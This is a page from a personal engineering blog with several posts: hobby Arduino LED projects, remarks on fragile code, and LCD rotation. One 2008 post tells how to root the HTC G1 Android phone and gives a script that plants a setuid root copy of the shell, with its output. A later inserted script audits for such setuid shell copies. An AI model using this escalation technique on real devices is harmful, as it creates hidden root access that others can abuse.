codeblog

3/8/2010

Cylon Dorkshield

Filed under: Blogging, Debian, Embedded, Ubuntu — kees @ 8:42 pm

I’ve finally soldered on the LEDs for the Cylon DorkShield I designed and got built in a recent DorkBotPDX PCB run. I’m having trouble with the programmer, but I got the shield mostly working:

Cylon DorkShield

10/7/2009

Larson Scanner on Arduino

Filed under: Blogging, Embedded, Ubuntu — kees @ 8:58 am

Inspired by the Larson Scanner project, I finally broke out my Arduino and ported the code from the ATtiny to the ATmega. (The Arduino IDE runs fine with openjdk-6.) I’m sure the power usage is terrible, but I wasn’t after long battery life. I wanted my very own Cylon eye.

DorkBoard running the Cylon eye

Since I was successful with porting the code and wiring up the Arduino, I figured I’d see if the tiny Arduino-clone called the “DorkBoard” would work with it too.

Later in the weekend I grabbed a AAA-battery holder and hooked that up so the eye is untethered from the USB power source. Next up, coding the pesky self-awareness.

11/9/2008

“rooting” the HTC G1 Android

Filed under: Blogging, Debian, Embedded, Security, Ubuntu, Vulnerabilities — kees @ 10:27 am

People noticed that running telnetd seemed to run as root. Later it was discovered that everything you typed was being run by the root user also. So, that ends the first mystery: when you typed “telnetd” both the Terminal user and root ran it. It would fail (without error messages) for the Terminal user, and run successfully for the root user. So now, the question is, what the f is a root shell doing mirroring user input?!

So, there is a much easier way to get root that doesn’t require network connectivity. While the /sdcard mount point is nosuid,noexec, it’ll still run scripts if you explicitly direct them to run. It seems that the weird background root shell doesn’t understand the alt-keys, so it can only run stuff that can be typed without using alt, shift, etc. So, put the following in /sdcard/pwn:


mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
cd /system/bin
cat sh > sh.root
chmod 4755 sh.root
mount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system

You can either do this by dropping the file in place over USB mass storage, or you can type it via the Terminal using “cat”. (Rebooting here might help get the root shell in a sane state.) Finally, just navigate there without slashes and run the script:


$ cd sdcard
$ sh pwn

You’ll see lots of errors (but these are only from the Terminal user). The script is, however, run by the root shell too. You can verify the results:


$ ls -l /system/bin/sh*
-rwxr-xr-x root          shell     86936 2008-09-13 00:13 sh
-rwsr-xr-x root          root      86936 2008-11-09 10:12 sh.root

Next up: cross-compiling a little helper to elevate to real UID 0, and require a password to keep malware from looking for setuid shells.
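
For anyone auditing a device or image for what the script above leaves behind, here is an added example (not part of the original post) that lists setuid files which are byte-for-byte copies of the system shell. The helper names and the scratch-directory demo are assumptions made for illustration; on a real system you would point it at /system/bin and /system/bin/sh.

```shell
#!/bin/sh
# Added example (not from the original post): list setuid files in a
# directory that are byte-for-byte copies of a reference shell binary.
# find_setuid_shell_copies and demo_audit are hypothetical helper names.

find_setuid_shell_copies() {
    dir=$1      # directory to audit, e.g. /system/bin
    ref=$2      # the legitimate shell, e.g. /system/bin/sh
    [ -d "$dir" ] && [ -f "$ref" ] || return 2
    # -perm -4000 matches any regular file with the setuid bit set.
    find "$dir" -type f -perm -4000 | sort | while IFS= read -r f; do
        # A setuid file with the shell's exact contents is a root-shell
        # backdoor candidate; unrelated setuid files are not reported.
        if cmp -s "$f" "$ref"; then
            printf '%s\n' "$f"
        fi
    done
}

# Constructed demo: a scratch directory standing in for /system/bin.
demo_audit() {
    tmp=$(mktemp -d) || return 1
    printf 'fake shell body\n' > "$tmp/sh"
    cat "$tmp/sh" > "$tmp/sh.root"           # same copy step as the post
    chmod 755 "$tmp/sh"
    chmod 4755 "$tmp/sh.root"
    printf 'something else\n' > "$tmp/ping"  # setuid, but not a shell copy
    chmod 4755 "$tmp/ping"
    cp "$tmp/sh" "$tmp/sh.bak"               # shell copy, but not setuid
    chmod 755 "$tmp/sh.bak"
    found=$(find_setuid_shell_copies "$tmp" "$tmp/sh")
    rm -rf "$tmp"
    # Report paths relative to the scratch directory.
    printf '%s\n' "$found" | sed "s|^$tmp/||"
}

demo_audit
```

Comparing contents rather than names catches a copy regardless of what it was renamed to, though it will miss a shell that was rebuilt or modified before being made setuid.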

1/9/2005

Fragile Code

Filed under: Embedded — kees @ 7:27 pm

I define fragile code as code that isn’t easily changed without introducing bugs. I think the biggest cause of fragile code is cut/paste algorithms. This is especially true for data access and processing routines.

The idea behind Object Oriented programming is that you end up creating accessor functions for all your data. It’s simple to change your data formats without breaking the program as a whole. When you don’t have an OO language, you create all kinds of methods to do your repeated work.

This is critically important for stable, readable, sane code. Functions should do something small, and do it very well. Then you can call a whole series of strong little functions, rather than cutting and pasting the same code over and over, only to wreck your day much later on.

1/4/2005

Fun with LCDs

Filed under: Embedded — kees @ 11:09 am

Worked for a little while last night trying to figure out how to rotate the image on an LCD screen. Turns out the controller actually has a built-in rotation ability. All the examples in the docs show a portrait LCD display being rotated to a landscape LCD display. I needed to do the opposite. Anyway, 1 typo and several LCD controller registers later, I had convinced it to work, but with a nasty flicker. I dug around a little more and finally found where I could define “line widths” for the display memory (as in, each line of physical memory is 256 bytes, but it’s only going to display 240 of those bytes). Thank goodness the display library had already been set up to deal with virtual spans. Anyway, with that in place, it came up perfectly. Yay! It’s going to wreak havoc on the testing routines: let’s just say the screen CRCs aren’t going to be the same. In fact, the screen CRCs might be just flat wrong; I’m not sure what portions of video memory it scans.
